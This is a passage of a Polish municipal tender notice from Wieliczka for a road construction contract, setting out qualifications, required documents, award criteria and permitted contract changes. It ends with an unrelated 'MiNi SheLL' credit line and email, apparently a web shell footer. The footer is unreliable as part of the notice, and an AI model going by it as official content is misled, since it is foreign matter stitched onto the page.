- co najmniej jedną osobą posiadającą uprawnienia budowlane* do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych. Osoba ta będzie pełniła funkcję projektanta w branży  sanitarnej.
- co najmniej jedną osobą posiadającą uprawnienia budowlane* do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych. Osoba ta będzie pełniła funkcję kierownika robót w branży  sanitarnej.
- co najmniej jedną osobą posiadającą uprawnienia budowlane* do projektowania w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. Osoba ta będzie pełniła funkcję projektanta w branży  elektrycznej.
- co najmniej jedną osobą posiadającą uprawnienia budowlane* do kierowania robotami budowlanymi w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. Osoba ta będzie pełniła funkcję kierownika robót w branży elektrycznej.

* lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów lub na zasadach określonych w przepisach odrębnych, tj. ustawie o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej z dnia 18 marca 2008 r.
Zamawiający dopuszcza łączenie funkcji osób pod warunkiem posiadania przez te osoby odpowiednich wymaganych uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy:
- udokumentują posiadanie opłaconego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości minimum 2 000 000,00 zł,
- udokumentują posiadanie środków finansowych lub zdolności kredytowej w wysokości minimum
3 000 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykonali w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną robotę budowlaną polegającą na - budowie lub/i przebudowie lub/i modernizacji lub/i remoncie drogi o nawierzchni asfaltowej wraz z odwodnieniem o wartości brutto nie mniejszej niż 800 000,00 zł.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony Formularz oferty - sporządzony według formularza stanowiącego Zał. nr 1 do SIWZ.
2. Wskazanie tej części zamówienia, której wykonanie wykonawca zamierza powierzyć podwykonawcy - sporządzone według formularza stanowiącego Zał. nr 7 do SIWZ.  Niezłożenie załącznika nr 7 do oferty jest rozumiane przez Zamawiającego, że Wykonawca nie zamierza powierzyć żadnej części zamówienia podwykonawcy. 
3. Dowód wpłacenia wadium. 
4. Wypełniony formularz cenowy - sporządzony według formularza stanowiącego załącznik nr 1a do SIWZ. Nie załączenie do oferty formularza nie będzie skutkować odrzuceniem oferty, natomiast Wykonawca który zostanie wybrany w przedmiotowym postępowaniu będzie zobowiązany najpóźniej w dniu podpisania umowy dostarczyć Zamawiającemu formularz cenowy sporządzony zgodnie ze złożoną ofertą. 
5. Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zamawiający w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda dokumentów dotyczących w szczególności:
- zakresu dostępnych wykonawcy zasobów innego podmiotu,
- sposobu wykorzystania zasobów innego podmiotu, przez wykonawce przy wykonywaniu zamówienia,
- charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
- zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówieniami.
Zamawiający wymaga, aby zobowiązanie innego podmiotu, o którym mowa w art. 26 ust.2b uPzp złożone zostało w formie pisemnej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - OKRES GWARANCJI I RĘKOJMI - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy w stosunku do treści oferty w przypadku (art. 144 ust. 1 uPzp):
a) zmian nazwy, siedziby lub innych danych Wykonawcy,
b) prośby Wykonawcy o udział lub zmianę podwykonawców,
c) zmiany kierownika budowy, oraz innych osób uczestniczących w wykonywaniu zamówienia, w przypadkach uzasadnionych przez Wykonawcę (np. choroba,  śmierć, utrata uprawnień, braku przynależności do stosownej Izby, brak możliwości wykonywania zawodu) pod warunkiem, iż nie będą to osoby o kwalifikacjach niższych niż osoby zastępowane,
d) zmiany terminu wykonywania umowy wynikającą z przedłużającego się wykonawstwa robót budowlanych będących przedmiotem zamówienia, z powodu zdefiniowanej siły wyższej (w tym m. in. niekorzystnych warunków atmosferycznych),
e) zmianę terminu wykonywania umowy wynikającą z przedłużających się procedur administracyjnych (np. związanych z zamówieniami publicznymi, pozyskiwaniem dodatkowych uzgodnień lub decyzji),
f) zmniejszenie ilości zamówienia wynikające z faktu, iż realizacja części zamówienia stała się dla zamawiającego niemożliwa albo nieuzasadniona społecznie lub ekonomicznie,
g) zmiany technologii  wykonania robót,
h) zmiany materiałów przewidzianych do wbudowania pod warunkiem uzyskania wcześniejszej zgody Zamawiającego oraz Inspektora Nadzoru,
i) na wniosek Wykonawcy o zmianę formy zabezpieczenia należytego wykonania umowy, pod warunkiem zachowania jego ciągłości i bez zmniejszania jego wysokości,
j) wszelkich zmian wynikających z konieczności dostosowania warunków już zawartej umowy do nowych uregulowań prawnych,
k) za zgodą zamawiającego  oraz Inspektora Nadzoru wykonanie robót zamiennych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wieliczka.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Zamówień Publicznych UMiG Wieliczce ul. Sienkiewicza 2 nr pok. 10 I p. tel. 12 263 43 31.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.01.2015 godzina 09:50, miejsce: Urząd Miasta i Gminy w Wieliczce 32-020 Wieliczka, ul. Powstania Warszawskiego 1 - sekretariat Burmistrza.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamawiający przewiduje współfinansowanie zadania ze środków Unii Europejskiej w ramach programu Małopolskiego Regionalnego Programu Operacyjnego. 

2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie (w oryginale) tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. 

3. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust.2b uPzp, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.

4. Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.

5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego warunek, określony w pkt. 5.1.1. SIWZ w zakresie art. 22 ust. 1 uPzp może być spełniony łącznie przez tych  Wykonawców, natomiast w zakresie art. 24 ust. 1 uPzp każdy z członków konsorcjum lub spółki cywilnej nie może podlegać wykluczeniu na jego podstawie. 

6. Uwaga. W przypadku, gdy złożone przez Wykonawców dokumenty, oświadczenia dotyczące warunków udziału w postępowaniu zawierają dane/informacje w innych walutach niż określono w nim. SIWZ, Zamawiający jako kurs przeliczeniowy waluty przyjmie kurs NBP z dnia publikacji ogłoszenia o zamówieniu Biuletynie Zamówień Publicznych. Jeżeli w dniu publikacji ogłoszenia nie został opublikowany średni kurs walut przez NBP, Zamawiający przyjmie kurs przeliczeniowy z ostatniej opublikowanej tabeli kursów NBP przed dniem ogłoszenia w BZP ogłoszenia o zamówieniu. Kursy walut dostępne są pod następującym adresem internetowym:
http://www.nbp.pl/home.aspx?f=/Kursy/kursy.htm
Zamawiający będzie korzystał z Archiwum kursów średnich - tabela A
http://www.nbp.pl/home.aspx?c=/ascx/archa.ascx

7. Dokumenty są składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, na zasobach których wykonawca polega na zasadach określonych w art. 26 ust.2b uPzp, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez wykonawcę lub te podmioty. 

8. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości. 

9. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski. 

10. W przypadku składania oferty wspólnej przez kilku wykonawców, każdy ze wspólników musi złożyć dokumenty wymienione w punkcie III.4.2.oraz listę/informację o której mowa w pkt III.4.4. Pozostałe dokumenty będą traktowane wspólnie. Wspólnicy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia, określoną w art. 366 Kodeksu cywilnego. Do oferty należy załączyć - w formie oryginału lub kopii potwierdzonej za zgodność z oryginałem przez notariusza -  pełnomocnictwo do reprezentowania wykonawców wspólnie występujących w postępowaniu..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com